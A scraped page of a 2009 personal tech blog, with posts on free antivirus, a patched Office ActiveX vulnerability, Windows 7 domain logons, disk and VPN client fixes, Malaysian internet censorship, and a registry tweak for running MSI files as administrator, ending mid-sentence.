Know this…I am not talking about features, that’s different, maybe your security product perform system wide application update, now, that’s a feature, security such as filtering through different protocols, email filtering, web filtering for example, shouldn’t be a “paid” should just be a standard one.

Anyway, Microsoft will also soon be in the chase, prime time. Its called MS Security Essentials dubbed Morro- a new free AV for PCs (they stopped beta test downloads already so its getting ready for RC).

Combined with Security Center, Windows Update, MS Firewall, its almost a full desktop security suite. However, it's yet to get the real world challenge, this is a fact. So, wait till it releases and we shall all see. (Word to note, HOME PC…) So, not sure where this is going for corporations, yet.
From a commercial point this service will seriously dent the rest of the commercial AV market, no doubt, but again, i would rather get an AV at 100% free than of those "free but we wont give you 100% brakes" ones...This is good for consumers, the competition will ease of our pockets for sure.
I bet there will be certain camps that will say its from Microsoft, we can't trust bla bla, just so you know, MS products are seriously “tested” (ie smothered and smacked) by millions of testers worldwide as soon as it sees daylight, every second, even at the point i am writing this, this is why you get lots of "bugs/problems" reported, so effectively, for me, as security paranoia, i rather have those bugs exposed, fixed than have/use a product that no one knows if its a big ass Swiss cheese or not. I don’t really care about the games the corporations play, i just want good quality software.

Wednesday, August 12, 2009

Possible new breed of mass spreading worms ? New vulnerabilities found in MS products.

Microsoft Office OWC10.Spreadsheet ActiveX BorderAround() Heap Corruption Vulnerability

The specific vulnerability exists in the OWC10.Spreadsheet.10 ActiveX control installed by Microsoft Office. By accessing specific methods in a certain order heap corruption occurs leading to remote code execution. If exploited, complete control of the affected system can be achieved under the rights of the currently logged in user.
This looks like a perfect candidate for a possible mass spreading worm from a newly discovered (and patched) vulnerability in Microsoft Office Web Components.
  • Office XP, Office XP Web Components, and Office 2000 Web Components (all editions)
  • Office 2003, Office 2003 Web Components, and Office 2003 Web Components for the 2007 Microsoft Office system (all editions)
  • Internet Security and Acceleration Server 2004 and Internet Security and Acceleration Server 2006 (all editions)
  • Microsoft BizTalk Server (all editions)
  • Visual Studio .NET 2003 (all editions)
  • Microsoft Office Small Business Accounting 2006 (all editions)
Especially those running ISA server, this is seriously critical. You must get patched, get secure.
Since the attack takes the permission of the logged on user, it is possible that UAC will prevent privileged tasks from the remote exploit attempt.
Patch immediately or stand a chance to be part of the statistics (hopefully not)

Monday, August 10, 2009

Logging on to Windows 2008 domain as an administrator on Windows 7 domain computer

This has probably been blogged a thousand times but let me be the 1001th ..blogger ;).

Thought I’d share this from Windows 7 perspective instead.

So, here’s the rundown:

  • I got myself W2008 R2 and Windows 7 RTM up and running, joined the domain and stuff.

Ok, so the thing is, when you use the logon UI from Vista/Windows 7, it does “see” the domain it just joined and sets it up for you by default as your default domain (there’s no more pull down domain lists).


Notice the part where it says “Log on to: BEAUTISEC”? Well, BEAUTISEC is my domain and you can skip the BEAUTISEC\username way of logging on and just go with username. If you want to log on to other than BEAUTISEC domain, do/see this …


So, lets say I've got a domain called MSFT, i would need to do the MSFT\domain user  and log on that way. But since i am in my primary domain i.e. BEAUTISEC, i don’t have to, i just logon.

I log on user sanjay and my password just like that works. But, when i log on as administrator, it doesn’t. Here’s why:

For administrator accounts

In the above scenario, local administrator logons will take precedence unless you specify the domain preceding the logon name like BEAUTISEC\administrator which is your domain administrator account. Then you get to logon as the domain “administrator” account.

See this screen below when i key in administrator (NOTE: The administrator here is the default built in administrator user for that PC, it could be renamed as admin or papasmurf and the effect below is still the same)


The “Log on to” value is automatically set to BEAUTIFULPC, which is the local PC name i.e logon locally. This “feature” can also help someone figure out what is the local built in admin account even before logging on, but yea..moving on..

For regular accounts

Domain logons will always take precedence unless you specify BEAUTIFULPC\<username> to log on to local accounts or in other words, other than the built-in administrator account. (See my note above about the local admin account)


The Log on to value automatically changes to my domain BEAUTISEC.

SIDE NOTE: You can’t change to classic logon interface for Vista/Windows 7 machines like how you see in XP for machines that are part of the domain. But you can enable the Interactive Logon: Do not display last username directive through registry or GPO (or GPEDIT locally). That shall let you enter your username manually but still no domain pulldowns… like in old days. ):

Saturday, August 8, 2009

My first Windows 7 BSOD


This happened when i was extracting a 7zip file and launching Google Chrome around the same time. I noticed that Kaspersky had reported some antiphishing around this same time when i was accessing a website.

Case: Win 7 64 bit RTM, Kaspersky Internet Security 2010, Google Chrome Beta 3, extraction using WinRAR Windows of a 7z file.

Windows 7 (RC, RTM) and static disk activity (about a minute of pause)

I was running into this problem since i got the RC build of Windows 7. I didn’t much bother as i was patient enough to wait till things started to work again (which eventually it does) and also figured it may be fixed by the time RTM is out.
Well, that isn’t the case, now, i am on the official RTM build (and 64bit) and it still choked every once in a while (similar to what i had on an RC 32bit).
Every other time, the disk activity on my SATA disk on my cheapo Dell Inspiron 1525 kept a static blink like a contiguous disk activity or as though there was a hardware failure on the disk. This causes certain newly launched apps or older ones which are running to freeze momentarily for almost about 30 seconds to 1 minute. This problem didn’t appear when i used Ubuntu 9.04 on this same exact system.
Well i found the problem (or more like the solution). It was the AHCI setting in my BIOS that causes this to happen (well, when i turned it to ATA mode, this problem didn’t crop up). This is also related to an older SATA HDD i inserted into my new Dell (the older SATA disk had higher RPM so i decided to use that instead)
SO if you get this annoying problem every once in a while, load up your BIOS, go to your SATA disk configuration and turn off AHCI and turn off flash cache (this is required according to the BIOS setting when you turn of AHCI.
Now, i am at peace :)
(NOTE: Some OSes including 7 BETA will not boot well according some internet searching i did) so, if things break, read next line.)
Use Ubuntu.

Thanks to my colleague Feroz Khan for the idea and this little snippet below from the WIKI link on AHCI above.

Friday, August 7, 2009

Check Point SSL Network Extender and Windows 7

If you use an older version of SSL Network Extender (SNEX) and you run the new Windows 7 (Beta, RC or RTM) on 64bit architecture you may get errors through both ActiveX and Java stating it failed to load. This is confirmed by Check Point and you need a new file.

You can fix this by manually downloading the SNEX client from CP’s website or click here that will update your older SNEX client. This should get you up and running in no time. Finally, get your admins to update their CPFW’s SNEX source files, available from this article from CP’s website to automatically upgrade other users as well.

Here’s a screenie.


Oh by the way, i am running Windows 7 64bit RTM. :D. Have a great weekend.

Malaysia for Internet Censorship? Vain Move. 5 reasons why.

I read the Star article and Nasdaq this on Internet censorship. I think this is simply a vain move by our government. Why?

  1. Nobody should play God, especially when it comes to information and information disclosure! Who determines if one site is politically “compliant” and is not. Who determines if a particular site is “racial” or simply stating the obvious? Who determines if a particular site is “good” or “bad”? Those who decides, are they being objective?
  2. No technology in the world can avoid accessing sites if people wanted. China tried, but people still could go to those sites “banned” by the government. When i was in Beijing in 2005, they blocked access to certain sites. All i had to do was to get myself a public proxy residing outside China and i could access those “banned” sites (to name a few methods. See this link for VPN feature. VPN keeps everything within an encrypted tunnel, so no one sees anything. And other ways of course :). I will definitely blog a comprehensive list if this were to materialize. :P
  3. It will slow things down even more. Putting up filters will undoubtedly slow things down. In fact, any devices in between you and the host-you-access/server can potentially slow stuff down. Especially if filtering is at the application layer (in this particular censorship case). Not to forget, we already have a substandard internet!
  4. Nobody will be happy to know that now EVERYTHING they do is now potentially INTERCEPTED. Those blocking tools basically get headers and certain data from your internet transaction and “analyze” them against their policy for a ACK or NACK. So, YES, EVERYTHING IS PICKED UP.
  5. It will create unnecessary workload to start managing and maintaining sites that are to be blocked (sites bloom faster than fungi on soggy bread), managing the devices, managing the people managing the devices etc..

Instead, the powers at play should educate users, encourage and promote the use of the internet to users to be wise and decide how they would like to use this facility. Give them an option to opt for a censorship program if they like, through installing of a software etc. Promote healthy thinking. Build trust with the people but also, keep the law in tact. Enforcement of cyber laws is really in its infancy here. This should be the first move.

Wednesday, August 5, 2009

MSI and Run As Administrator

Some MSI programs require elevated privilege to run and its always cumbersome to run it through runas.

In Windows Vista/7, the shell integration (right click) of an Exe will contain a Run As Administrator function like below.


But for MSI files, there’s no such context! Of course, there are otherways but this right click thingy is what i want, its quick and easy.


MSI files do not have the Run as administrator shell integration.

How to make that Run as administrator come integrated with MSI and or other executables (e.g. VBS, MSI, BAT). Try this.

For MSIs

Start notepad.exe and paste the below text exactly

Windows Registry Editor Version 5.00



Don’t worry about text residing to a point you can see, just copy and paste the whole table. When you paste the above, it MUST look something like this:


If it doesn’t stop right there, something is not right. Try again.

Now save this document as shell_enable_msi.reg (filename doesnt matter, just as long the extension is .reg. Make sure the registryicon appears after you do that like below.


This means its associated with the registry tool. Now double click the icon and UAC should complain, but just say yes on both counts!



Once exported, you should see this;


Now try again with that MSI extension. Voila!


And there you go.

Anyway, in case you’re curious what all those jargon you pasted into your registry its nothing much, its actually…